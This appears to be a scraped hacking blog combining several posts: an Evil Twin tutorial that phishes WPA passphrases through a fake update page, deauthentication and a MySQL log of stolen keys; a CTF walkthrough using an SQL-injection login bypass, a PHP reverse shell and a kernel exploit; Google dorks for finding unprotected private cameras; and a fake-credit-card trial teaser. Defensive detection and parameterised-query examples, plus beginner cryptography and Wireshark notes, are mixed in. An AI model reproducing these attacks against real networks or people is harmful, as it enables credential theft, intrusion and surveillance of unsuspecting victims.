Enter the subject of the email.
Now SET will ask you whether you want the body of the message to be HTML or plain text.
P for plain text or H for HTML.
Enter the body text.
Enter the body of the email here. If you chose an HTML message then add the HTML tags as well.
Press Control+C to send the email.
Press Enter to go back to the main menu.

This is how hackers perform a mass email attack.


Evil Twin Access Point tutorial Kali-Linux

What is an evil twin access point?



An evil twin access point is a wireless access point that has been installed on a secure network without explicit authorization from a local network administrator, whether added by a well-meaning employee or by a malicious attacker.

To the user, the evil twin looks like a hotspot with a strong signal; that’s because the attacker has not only used the same network name and settings as the “good twin” he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.

If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user’s computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user’s Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills; we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to them.

Step 1:

Log in to your Kali Linux machine.

Establish an Internet connection to your host machine.

Now we have to install a DHCP server as follows.

Open the terminal and type apt-get install dhcp3-server as shown below:


Step 2:

Now we need to configure our DHCP server as below.

Open your terminal and type nano /etc/dhcpd.conf; you should have a blank file opened up in your terminal.

Now type the configuration shown in the screenshot below.


After typing, press Ctrl+X, then press Y and hit Enter to save it.

Step 3:

Now download the security update page which the client will see when they open up the web browser.

To do that, navigate to /var/www in your terminal (cd /var/www) and run the following:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip


Now type the following to start your Apache server and MySQL:

 /etc/init.d/apache2 start

/etc/init.d/mysql start


Now that MySQL is loaded, we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page.

Type the following:

mysql -u root

       create database evil_twin;

       use evil_twin

       create table wpa_keys(password varchar(64), confirm varchar(64));


In the above screenshot the database already exists.

Step 5:

Now we need to find our local network adapter interface name and our local IP.

Open a new terminal and type:

ip route (take note of the local IP and the wired interface)

airmon-ng

airmon-ng start wlan0

clear


NOTE: eth0 is my interface name and 192.168.0.105 is my local IP

airodump-ng-oui-update


airodump-ng -M mon0 (take note of the target's ESSID, BSSID and channel number)

airbase-ng -e [ESSID] -c [ch. #] -P mon0

NOTE: [ESSID] is your target's ESSID and [ch. #] is the target's channel number.


Step 6:

Our evil twin access point is now up and running. We need to configure our tunnel interface so we can create a bridge between our evil twin access point and our wired interface. Our tunnel interface is named at0; it was created when we created the evil twin access point using airbase.

Don’t close the airbase and mysql terminals.

Now open a new terminal and type as follows:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

Now we need to add a routing table entry and enable IP forwarding so we can forward traffic to and from our evil twin access point.

So, type the following:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start


Step 7:

Now we need to force the clients to connect to our evil twin access point. To accomplish this we disconnect the clients by performing a de-authentication attack. To do that, first we need to create the blacklist file that contains the BSSID of the target.

Do as follows:

echo [BSSID] > blacklist

NOTE: [BSSID] is the BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]


Now go back to the airbase terminal to check if any client has connected to your evil twin access point.

If a client is connected to the evil twin access point, he will see the security page shown below, which asks for the password.


Here the client enters his WPA/WPA2 password and clicks on update.

Now go over to the mysql terminal and type

use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our mysql database}


You have successfully harvested the WPA passphrase from the victim in plain text.

Now close all the terminal windows and connect back to the real AP to check whether the password is correct, or whether the victim was himself a hacker and tricked you. Haha.

You don’t need to name your AP after an existing AP; you can also use a random free open WiFi style name to gather clients on your AP and start pentesting.
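From the defender's side, as an added example that is not part of the tutorial: the evil twin brought up in Steps 5 and 6 (airbase-ng -e [ESSID] -c [ch. #] -P mon0) advertises a trusted network name from a new BSSID as an open network, and the mdk3 step in Step 7 floods the air with deauthentication frames. The script below flags both conditions in constructed scan records and constructed frame tuples; the ESSIDs, BSSIDs, timestamps and thresholds are assumptions, not values from the page.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPoint:
    essid: str
    bssid: str
    channel: int
    privacy: str  # "OPN" for an open network, otherwise e.g. "WPA2"


# Constructed inventory of networks we own: ESSID -> (legitimate BSSIDs, required privacy).
TRUSTED = {
    "CorpWiFi": ({"00:11:22:33:44:55", "00:11:22:33:44:56"}, "WPA2"),
    "CorpGuest": ({"00:11:22:33:44:57"}, "WPA2"),
}

# Constructed scan results: two legitimate APs, an open clone of CorpWiFi on the
# same channel (what airbase-ng -e CorpWiFi -c 6 -P produces), and a neighbour.
OBSERVED = [
    AccessPoint("CorpWiFi", "00:11:22:33:44:55", 6, "WPA2"),
    AccessPoint("CorpGuest", "00:11:22:33:44:57", 11, "WPA2"),
    AccessPoint("CorpWiFi", "de:ad:be:ef:00:01", 6, "OPN"),
    AccessPoint("Neighbour", "aa:bb:cc:dd:ee:ff", 1, "WPA2"),
]

# Constructed monitor-mode frames as (timestamp_s, fc_type, fc_subtype, bssid):
# 30 deauthentication frames (type 0, subtype 12) within 0.3 s against CorpWiFi,
# one data frame, and a single stray deauth from the neighbour.
FRAMES = [(0.01 * i, 0, 12, "00:11:22:33:44:55") for i in range(30)]
FRAMES += [(0.20, 2, 0, "aa:bb:cc:dd:ee:ff"), (5.0, 0, 12, "aa:bb:cc:dd:ee:ff")]


def find_evil_twins(observed, trusted):
    """Return [(ap, reasons)] for every AP that advertises a trusted ESSID suspiciously."""
    findings = []
    for ap in observed:
        if ap.essid not in trusted:
            continue  # a foreign network, not impersonating one of ours
        allowed, required_privacy = trusted[ap.essid]
        reasons = []
        if ap.bssid.lower() not in {b.lower() for b in allowed}:
            reasons.append("unknown BSSID for a trusted ESSID")
        if ap.privacy != required_privacy:
            reasons.append(f"privacy {ap.privacy}, expected {required_privacy}")
        if reasons:
            findings.append((ap, reasons))
    return findings


def deauth_bursts(frames, threshold=20, window=1.0):
    """BSSIDs that sent more than `threshold` deauth frames within any `window` seconds."""
    per_bssid = {}
    for ts, ftype, subtype, bssid in frames:
        if ftype == 0 and subtype == 12:  # management frame, deauthentication
            per_bssid.setdefault(bssid, []).append(ts)
    flagged = set()
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end, ts in enumerate(times):  # sliding window over sorted timestamps
            while ts - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged.add(bssid)
                break
    return flagged


if __name__ == "__main__":
    for ap, reasons in find_evil_twins(OBSERVED, TRUSTED):
        print(f"ALERT {ap.essid} {ap.bssid} ch{ap.channel}: {'; '.join(reasons)}")
    for bssid in deauth_bursts(FRAMES):
        print(f"ALERT deauth flood against {bssid}")
```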


What is reverse engineering?


Reverse Engineering (RE) is the decompilation of an application, regardless of the programming language used to create it, so that one can obtain its source code or any part of it.

The reverse engineer can reuse the obtained code in his own programs, or change an existing (already compiled) program so that it behaves in other ways. He can use the knowledge obtained from reverse engineering to improve application programs by fixing their defects, also known as bugs. But most importantly, one can get extremely useful ideas by observing how other programmers work and think, and thus improve his own skills and knowledge!

What comes to mind when we hear RE is cracking. Cracking is as old as programs themselves. To crack a program means to trace and use a serial number or any other kind of registration data needed for the proper operation of the program. Therefore, if a shareware program (freely distributed, but with some restrictions, like crippled functions, nag screens or limited capabilities) needs valid registration data, a reverse engineer can recover that information by decompiling a particular part of the program.

In the past, many software companies have accused others of reverse engineering their products and stealing technology and knowledge. Reverse engineering is not limited to computer applications; the same happens with cars, weapons, hi-fi equipment, etc.




The Harvester Kali Linux Tutorial

This tool is intended to help penetration testers in the early stages of a penetration test to understand the customer's footprint on the Internet. It is also useful for anyone who wants to know what an attacker can see about their organization.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills; we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to them.

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and the SHODAN computer database.

theharvester gathers information from the following sources:

Google: emails, hosts/subdomains.
Google profiles: employee names.
Bing search: emails, subdomains/hostnames, virtual hosts.
PGP servers: emails, hosts/subdomains.
LinkedIn: employee names.

How to use theharvester

Open your terminal and type the following command. It displays all the options you can use with theharvester.

theharvester


Search emails and hosts with theharvester

theharvester -d hackthissite.org -l 500 -b google

-d: Domain to search.
-l: Limit the search to the specified number of results.
-b: Specify the search engine name.

Search information from all the search engines supported by theharvester.

This is a cool feature: we can extract the maximum information from all the supported search engines in a single command. The full command looks like this:

theharvester -d hackthissite.org -l 500 -b all

You have to add the all keyword at the end.


Save scan results into an XML file

You can save scan results into a file. The complete command:

theharvester -d hackthissite.org -l 500 -b all -f result.txt

-f is for specifying a file name where the results will be stored. Once your scan is complete, check your home directory for the XML file.

Sunday, August 20, 2017

Vulnimage Walkthrough

This blog post contains a walkthrough for the boot-to-root virtual machine Vulnimage. The purpose of this boot-to-root challenge is to test users in the network security skill sets needed for penetration tests, as the user attempts to gain root/system privileges on the remote machine. After determining the IP address of the Vulnimage virtual machine by viewing the ARP table (show arp) of my layer 3 switch, I used the tool NMAP to scan the target.



After the NMAP scan had finished, I examined the report and identified that there was an Apache service running on the machine on port 80; I decided this would be where I first focused my efforts on gaining root privileges on the machine. At the root of the Apache server I found a link to myblog.php, which appears to be a blog created by one of the target machine's users.


Following the links through the website I was able to find a login page used by the blogger to sign into the blogging service.



After viewing the response from the web server regarding the login attempt, I resent the login request to the Repeater tab, modified the password field and replaced admin with "' or 1=1 -'", which is a common SQL injection used to bypass authentication.



The password field contains “‘ or 1=1 –‘”, which bypasses the authentication process.



As shown in the Burp Repeater response, I was able to see that I had successfully bypassed the login page using the credentials ‘admin:’ or 1=1 –” and was able to make a post on the blog as the “admin” user. While examining the website further I came across a link which allowed me to modify a “user’s” profile; specifically, I was able to modify the “sig” value, which changes the “signature” of a user. I changed the signature of the admin user to test. As I was able to change the signature to the value “test”, I then decided to test whether the web server would accept the “sig” field if it contained PHP code.




After I had injected the PHP reverse shell code, I identified that the shell was located in the admin-sig.php file within the profiles directory; using the tool curl, I was able to activate the PHP reverse shell.




I was able to determine that my shell had the privileges of www-data, that I was currently at the “/” of the remote file system, and that the version of the kernel I was working with was “Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux”. I found a relevant exploit at “http://exploit-db.com/sploits/2009-therebel.tgz”; I downloaded the exploit, placed it within the /var/www/ directory on my local machine and started the local Apache server.





Once the exploit was transferred I used the tar command to unpack the .tgz file; once unpacked I ran the script “therebel.sh”, and once the script had run successfully I checked to see if I had gained root privileges for the shell.




I have successfully exploited the Vulnimage virtual machine and gained a reverse shell from the target and escalated the shell to root permissions, successfully gaining full root control of the target machine.
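The login bypass described in this walkthrough, as an added example that is not the author's code and not part of Vulnimage: a login query built by string interpolation is opened up by the ' or 1=1 -- payload, while the same query with bound parameters is not. It uses Python's sqlite3 module with constructed user rows; the table layout and credentials are assumptions.

```python
import sqlite3

# Constructed sample users. A real application stores a salted password hash,
# never the plaintext; the shape of the comparison is what matters here.
USERS = [("admin", "s3cret-admin-pw"), ("alice", "wonderland")]

# The payload from the walkthrough, in its "--" comment form.
PAYLOAD = "' or 1=1 --"


def make_db():
    """In-memory SQLite database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def build_vulnerable_query(username, password):
    """String interpolation: the attacker's quotes and comment marker become SQL."""
    return (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


def vulnerable_login(conn, username, password):
    """Returns the matched username, or None. With PAYLOAD as the password the
    WHERE clause becomes  username = 'admin' AND password = '' OR 1=1 --'
    which is true for every row, so the first user (admin) is returned."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Bound parameters: the input is passed as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_login(db, "admin", PAYLOAD))  # admin
    print("parameterised:", safe_login(db, "admin", PAYLOAD))     # None
```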




Wednesday, August 2, 2017

How Hackers Hack Security Camera and Webcams Using Google Dork


HELLO guys ..!!

Today I'll show how hackers get access to IP cameras and webcams without permission.
Before we start I would like to say that this is only for educational purposes.

So, let's start ..!!

Here are some dorks. Just copy them without the ( * ) into Google search.

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor

Now click on any Google search result. You will get access to unprotected security cameras..!!




Tuesday, August 1, 2017

A Brief Introduction to Cryptography


Nowadays the Internet is an important part of life. We also use the Internet for sending confidential data like passwords, and for storing military secrets. But the Internet is an insecure medium. Do you know why?

Insecure Medium:
Imagine you are sending some data. On the Internet, data is split into packets and sent to the destination. Do you think the data reaches the destination directly? If you think so, you are wrong. The packets pass through different routers before the data is finally delivered to the user. In this gap, intruders (I mean attackers) take advantage. Intruders can see what you are sending, because your data is plain and easily readable by anyone.

How to secure the data?
We cannot stop the intruders and their activities, but we can make our data unreadable for intruders. For this purpose, cryptography was introduced.

Introduction to Cryptography:
Cryptography was introduced by Julius Caesar. Cryptography is a technique in which we change plain text into unreadable text (known as cipher text).

In your home you put money in a locker, don’t you? The locker probably has a key to open it. Imagine a thief comes to your home to steal. If he wants to open the locker, he certainly needs the key. Without the key, he cannot do it. Yeah, I can hear what you are saying: he can break the locker. But if the locker is very strong, he cannot open it at all.

Likewise, in cryptography we are going to create a key for our data so that intruders cannot read it. It is possible to read the data if the encryption (explained later) is weak, so we need the encryption method to be very strong.

Terminologies used in cryptography:

Plain Text: the original data or text.

Cipher Text: the encrypted (unreadable) message.

Encryption: changing the plain text into unreadable text.

Decryption: changing the cipher text back into plain text.

Traditional Encryption Methods:

Caesar Cipher

Monoalphabetic Cipher

Playfair Cipher

Hill Cipher

Polyalphabetic Cipher

Rail Fence Technique.

Caesar Cipher: the simplest encryption method. In this method we replace each letter with the letter a fixed number of positions further along the alphabet.
Eg:
Consider the plain text: break
If we use key 3, then the cipher text is found by:

b+3 r+3 e+3 a+3 k+3

Shifting each letter by three, the final cipher text is:

euhdn

If the intruders see the cipher text (here “euhdn”), they cannot understand anything. But this method is hackable, because intruders can try all 25 shifts and finally get the result.
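The shift and the 25-shift brute force described above, as an added example (not code from the original post): Caesar encryption and decryption, the exhaustive key search, and a simple English letter-frequency score that picks the right shift automatically on a longer message. The frequency table holds standard approximate English values and the sample sentence is constructed.

```python
import string

ALPHABET = string.ascii_lowercase

# Approximate relative frequencies of letters in English text (percent).
ENGLISH_FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0,
    "h": 6.1, "i": 7.0, "j": 0.15, "k": 0.8, "l": 4.0, "m": 2.4, "n": 6.7,
    "o": 7.5, "p": 1.9, "q": 0.1, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8,
    "v": 1.0, "w": 2.4, "x": 0.15, "y": 2.0, "z": 0.07,
}


def caesar_encrypt(plaintext, key):
    """Shift every letter forward by `key` positions (mod 26); other characters pass through."""
    out = []
    for ch in plaintext.lower():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(ciphertext, key):
    """Decryption is encryption with the negated key."""
    return caesar_encrypt(ciphertext, -key)


def brute_force(ciphertext):
    """All 25 candidate plaintexts, keyed by the shift that produced each one."""
    return {key: caesar_decrypt(ciphertext, key) for key in range(1, 26)}


def english_score(text):
    """Sum of letter frequencies: English-looking text scores higher than a random shift."""
    return sum(ENGLISH_FREQ.get(ch, 0.0) for ch in text)


def best_guess(ciphertext):
    """Try every shift and return (key, plaintext) for the most English-looking candidate."""
    candidates = brute_force(ciphertext)
    key = max(candidates, key=lambda k: english_score(candidates[k]))
    return key, candidates[key]


if __name__ == "__main__":
    cipher = caesar_encrypt("break", 3)
    print(cipher)                                   # euhdn, as in the text
    for key, guess in sorted(brute_force(cipher).items()):
        print(f"shift {key:2d}: {guess}")
    print(best_guess(caesar_encrypt("meet me at the usual place at noon", 7)))
```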

Many encryption methods have been introduced to provide better security.

Today's encryption methods:


AES (Advanced Encryption Standard)
DES (Data Encryption Standard)
RSA (named after its creators)
MD5 (Message Digest 5)
SHA (Secure Hash Algorithm)

For secure transactions, SSL (Secure Socket Layer) was introduced.


Analyzing Packets in Wireshark


Windows and Macintosh users can download it from here. Kali already contains this tool. If you have not downloaded Kali Linux yet, click here to download it.



How To

1.   Start Wireshark from the command line or from the menu option.


2.   It will open Wireshark as shown below:


3.  Here we go: we will require monitor mode to start packet sniffing, so we will start sniffing in monitor mode.

4.  As soon as sniffing starts, it will start capturing packets.

5.  You will get thousands of packets. We can filter them as required; for example, apply a filter on the BSSID.

6.  We can filter the packets to show only management frames (wlan.fc.type == 0).

7.  Filter to show only data frames (wlan.fc.type == 2).


Wardriving

Wardriving is a term for a person with a vehicle, a laptop, a wireless card and a GPS setup who drives around a city and identifies the status of different wireless access points at different geographical locations in the city.

The wireless range can be extended using wireless antennas. To get details about geographical locations you can use GPS to find out the latitude and longitude.


Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to ...